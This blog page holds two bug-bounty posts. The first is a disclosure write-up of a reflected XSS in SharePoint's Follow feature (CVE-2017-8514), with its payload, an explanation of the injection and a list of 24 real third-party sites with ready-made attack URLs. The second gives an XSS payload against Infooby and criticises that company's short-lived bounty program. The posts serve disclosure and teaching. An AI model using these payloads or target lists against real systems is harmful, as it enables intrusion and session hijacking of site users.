Showing posts with label bug bounty. Show all posts

Wednesday, June 14, 2017

A Look at CVE-2017-8514 --- SharePoint's `Follow` Feature XSS

TL;DR: All your SharePoint installations are belong to us. The XSS (worth $2500) affects both the on-premises and the online version and looks like ...

http|https://<Any SharePoint URL Goes Here>?FollowSite=0&SiteName='-confirm(document.domain)-'

SharePoint needs no further introduction given that it is one of the most popular enterprise content management systems. According to Redmond Magazine: "SharePoint and OneDrive are used by more than 75,000 customers, with more than 160 million users." I am not a SharePoint MVP, but as far as I can see it comes in two flavors, i.e., SharePoint on-premises and SharePoint Online. Organizations tend to prefer the on-premises model given that it is, in general, only reachable over the intranet or internal network.

One common use-case I have seen in organizations: many teams (e.g., HR, Marketing, Application, Legal and/or Security) work side by side in their day-to-day jobs. In SharePoint, each team can have a dedicated site or page where members share relevant material (documents, news etc.) among themselves, while sharing outside the team is also possible. SharePoint provides fine-grained permission levels and role-based access control.

SharePoint is all about sharing. In that spirit, SharePoint provides a "Follow" feature for sites, so that a site's activity shows up in your newsfeed. One way to follow a site is to click the "Follow" control at the top right of the page. It looks like ...

Follow a Site Feature in SharePoint

At that moment, SharePoint sends a POST request to the following end-point: bbmsft.sharepoint.com/_vti_bin/client.svc/ProcessQuery (bbmsft is the tenant name in my case and will be different in yours). I played around with that POST request but was unable to find anything interesting. Then I observed that this is not the only way to follow a site. You can also share your site(s) with others using the Share feature available at the top right corner. Once you send out a Share invitation, the email on the receiving end looks like ...


The email's content includes the same "Follow" feature, but this time in the form of a plain GET request. The URL at that point looks like:


The URL has two GET parameters, i.e., FollowSite=1 and SiteName=<AnySiteNameGoesHere>. FollowSite holds a Boolean flag, 0 or 1: 0 for not following and 1 for following. The SiteName parameter is the one of interest. It is reflected back inside a script context like the following (watch out for the keyword ReflectionHere). In real life, this would be the name of the site you want to follow.

<script type="text/javascript">
//<![CDATA[
...
SP.SOD.executeFunc('followingcommon.js', 'FollowSiteFromEmail', function() { FollowSiteFromEmail('ReflectionHere'); });
...
//]]>
</script>

As you can see in the above code, the developers wrap ReflectionHere in single quotes, and I found that potentially dangerous characters such as ', <, > and / were not encoded. To keep it simple, a payload like '-confirm(document.domain)-' does the job: the leading quote closes the string literal, the subtraction operators splice the confirm() call into the expression, and the trailing quote re-opens a string so that the call to FollowSiteFromEmail still parses (it now receives ''-confirm(document.domain)-''). I also noticed that the above inline JavaScript snippet only becomes part of the DOM if the GET parameters (FollowSite and SiteName) are present in the URL. The screen-shot is given below.



A quick PoC of this XSS on one of the test-beds I had ...


Situation In the Wild:

The XSS is simple because all it needs is a SharePoint URL plus two GET parameters, one of which holds the XSS payload:

http[s]://<SHAREPOINT URL>?FollowSite=0&SiteName='-confirm(document.domain)-'

Google dorking (inurl:SitePages/Home.aspx?) for SharePoint home pages shows 19,000+ results. A SharePoint site's home page generally has the format http(s)://<Any SharePoint URL>/SitePages/Home.aspx. Some notable vulnerable examples I was able to identify quickly from Google dorks are given below. If you have a SharePoint site and you can see the "Follow" feature on the page, then there is a good chance that you are vulnerable. Please keep in mind that the following examples (government sites, agencies, universities and colleges) do not include on-premises SharePoint installations.

  1. https://espace2013.cern.ch/ls1planning/sitepages/home.aspx?FollowSite=0&SiteName=%27-confirm(document.domain)-%27
  2. https://info.undp.org/gssu/onlinetools/SitePages/Home.aspx?FollowSite=0&SiteName=%27-confirm(document.domain)-%27 
  3. http://www.karnataka.gov.in/Pages/kn.aspx?FollowSite=0&SiteName=%27-confirm(document.domain)-%27 
  4. https://web.fnal.gov/organization/Finance/business/SitePages/Home.aspx?FollowSite=0&SiteName=%27-confirm(document.domain)-%27 
  5. https://ocexternal.olympic.edu/PSNSOCoffice/SitePages/Home.aspx?FollowSite=0&SiteName=%27-confirm(document.domain)-%27
  6. https://www.whi.org/researchers/SitePages/Home.aspx?FollowSite=0&SiteName=%27-confirm(document.domain)-%27
  7. http://www.mapnagenerator.com/en/SitePages/Home.aspx?FollowSite=0&SiteName=%27-confirm(document.domain)-%27
  8. https://gnssn.iaea.org/NSNI/PoS/IGALL/SitePages/Home.aspx?FollowSite=0&SiteName=%27-confirm(document.domain)-%27
  9. https://www.adced.ae/sites/EN/SitePages/Home.aspx?FollowSite=0&SiteName=%27-confirm(document.domain)-%27 
  10. https://www-scotland.k12.sd.us/library/SitePages/Home.aspx?FollowSite=0&SiteName=%27-confirm(document.domain)-%27
  11. http://hec.gov.pk/Urdu/scholarshipsgrants/IPHDFP5000F/SitePages/Home.aspx?FollowSite=0&SiteName=%27-confirm(document.domain)-%27
  12. https://info.spcollege.edu/Community/AP/SitePages/Home.aspx?FollowSite=0&SiteName=%27-confirm(document.domain)-%27
  13. https://www.blr.aero/Airlines/SitePages/Home.aspx?FollowSite=0&SiteName=%27-confirm(document.domain)-%27
  14. http://www.irti.org/English/Events/11th%20IDB%20Global%20Forum%20on%20Islam/SitePages/Home.aspx?FollowSite=0&SiteName=%27-confirm(document.domain)-%27
  15. https://www.ead.ae/SitePages/Home.aspx?FollowSite=0&SiteName=%27-confirm(document.domain)-%27
  16. https://my.queens.edu/its/SitePages/Home.aspx?FollowSite=0&SiteName=%27-confirm(document.domain)-%27
  17. http://www.skylineuniversity.ac.ae/sites/SUC/Portal/SitePages/Home.aspx?FollowSite=0&SiteName=%27-confirm(document.domain)-%27
  18. https://www.dmacc.edu/urban/sac/SitePages/Home.aspx?FollowSite=0&SiteName=%27-confirm(document.domain)-%27
  19. http://nfm.mjs.bg/NFMs/EN/SitePages/Home.aspx?FollowSite=0&SiteName=%27-confirm(document.domain)-%27
  20. https://cowork.us.extranet.lenovo.com/promotions/nax86vug/SitePages/Home.aspx?FollowSite=0&SiteName=%27-confirm(document.domain)-%27
  21. https://www.utp.edu.my/Academic/CSIMAL/SitePages/Home.aspx?FollowSite=0&SiteName=%27-confirm(document.domain)-%27
  22. https://rcilab.in/SitePages/Home.aspx?FollowSite=0&SiteName=%27-confirm(document.domain)-%27
  23. https://www.sgsts.org.uk/governor/SitePages/Home.aspx?FollowSite=0&SiteName=%27-confirm(document.domain)-%27
  24. https://portal.veic.org/sunshot/SitePages/Home.aspx?FollowSite=0&SiteName=%27-confirm(document.domain)-%27

Timeline and Bounty:

Reported to Microsoft (secure@microsoft.com): 20th February 2017
Triage and case number assignment email from secure@microsoft.com (case # 37482): 20th February 2017
Reproduction confirmation email from secure@microsoft.com: 28th February 2017
Bounty qualification email from secure@microsoft.com: 9th March 2017
Email from bounty@microsoft.com about the bounty amount ($2500): 10th March 2017


On 9th June 2017, I received an email saying that the fix would be released as part of the June 2017 updates. Here is the link to CVE-2017-8514: https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8514. Microsoft has also released a fix for a stored XSS I found in SharePoint Project Web App; CVE-2017-8551 (https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8551) covers that one. I will try to do a write-up on it later.


I think, it's time to go and patch your SharePoint.


Sunday, April 17, 2016

Gone in Few Hours: Infooby's Fake or Questionable Bug Bounty Program

Bug bounty programs are great in many ways: a learning perspective, monetary benefits for bug hunters, and a step towards safe and secure web applications. Bug bounty programs are a win-win situation for both parties, i.e., the bug hunter(s) and the organization(s). Bug hunters get money/rewards (or an entry in a hall of fame) for finding and reporting legitimate bugs and improve their pentesting skills by looking at live targets, while at the same time organizations improve their security by fixing the bugs reported by hunters around the world. Please keep in mind that bug hunters have different skill-sets, mind-sets and cultures, so organizations receive a variety of reports, including high-quality stuff.

I like participating in bug bounty programs in my free and spare time (though I am not very active). A few days ago, when I was reading my Twitter feed, I came across the following Tweet by @disclosedh1.


"Curiosity killed the cat". I thought I would take a quick look at Infooby's web application for XSS, because in the program announcement (now gone and no longer available) they said they were interested in XSS reports. Initially, I had no idea that Infooby was acting maliciously and that these guys had announced the program only to collect the reports so that they could fix the bugs and improve their web application. They wanted a win situation, but only for themselves. One aspect of announcing a bug bounty program is the marketing stunt, or getting media attention. I think Infooby wanted the limelight.

In a matter of a few minutes, I found 2 XSS issues in their web application and reported them (#130596 & #130733) via HackerOne. One of the XSSes is still live. Open the following URL in the Firefox browser.


The screen-shot is also given below. The other XSS was here (I think they have since fixed it): https://infooby.com/places?address="><img src=x onerror=prompt(1);>.


I found 2 XSSes in quick time, so I assumed there were many more and wanted to continue testing, but I soon started getting the error message "Resource limit is reached" and/or a 508 status code, and the site was even going down again and again. It shows that Infooby was not prepared for the initial onslaught from the HackerOne community. The homework on Infooby's side was missing: if you announce a bug bounty program, there is a great chance that several people will immediately start scanning your web application with automation tools (maybe as part of an initial, quick probe), and automation tools mean a bombardment of attack payloads. Other testers had also noticed the error message. In the meantime, Infooby awarded someone a $20 bounty, although in the program announcement they had stated that the minimum bounty amount would be $50. Meanwhile, Infooby's main site kept going down and coming back up because of the ongoing testing from the community.

On the next day, I received an email from HackerOne regarding the status of Infooby's bug bounty program. In short, it was no longer there. The contents of the email can be seen in the screen-shot.


It raises the following questions in my mind, and there are still no clear answers. How can we stop this type of fake/questionable bounty program in the future? What can mediators or facilitators like HackerOne and Bugcrowd do in this regard? What happened to the bug reports (current status: "Not Applicable") Infooby received in the meantime, and won't they now fix those bugs for free?
 
I think we cannot stop the announcement of fake bug bounty program(s) if they are announced on the company's own web page. Any web site can do this, and no one from outside can question its credibility, since it is the company's sole jurisdiction. Bug bounty mediation/facilitator platforms like HackerOne and Bugcrowd, however, can do something, e.g., a "security deposit for guarantee or best practices". The idea is the same as in real life: if we rent a house or apartment, we pay a deposit, and when we leave the house we normally get the money back. HackerOne and Bugcrowd should ask for such a deposit to make sure that the company is serious about its bug bounty program, and if the company engages in questionable practices, HackerOne and Bugcrowd may take the money from this deposit or pool and distribute it to the valid bug submitters. If there is a pool of money like that (e.g., initially 5K USD per bug bounty program announcement), then there will be no more free bugs even if the bug bounty program vanishes. This pool of money would motivate both parties to work in the best possible way.

Nowadays, in general, we (i.e., bug submitters) treat a bug bounty program like a race. We try to find bugs (especially low-hanging fruit) as soon as possible, immediately after the program announcement, without keeping an eye on how genuine the program is. I think this is the wrong approach at the moment (unless we have a deposit or pool as mentioned earlier), because at the start we do not know how reputable a program is. Believe me, the bugs are there, and there is no need to treat it like a race. Trust in your capabilities and you will find bugs, provided you have enough motivation. Happy Hunting.

Note: If you have any other good ideas on how we can stop fake program(s), or want to share your bad experience(s) with bug bounty program(s), please feel free to comment.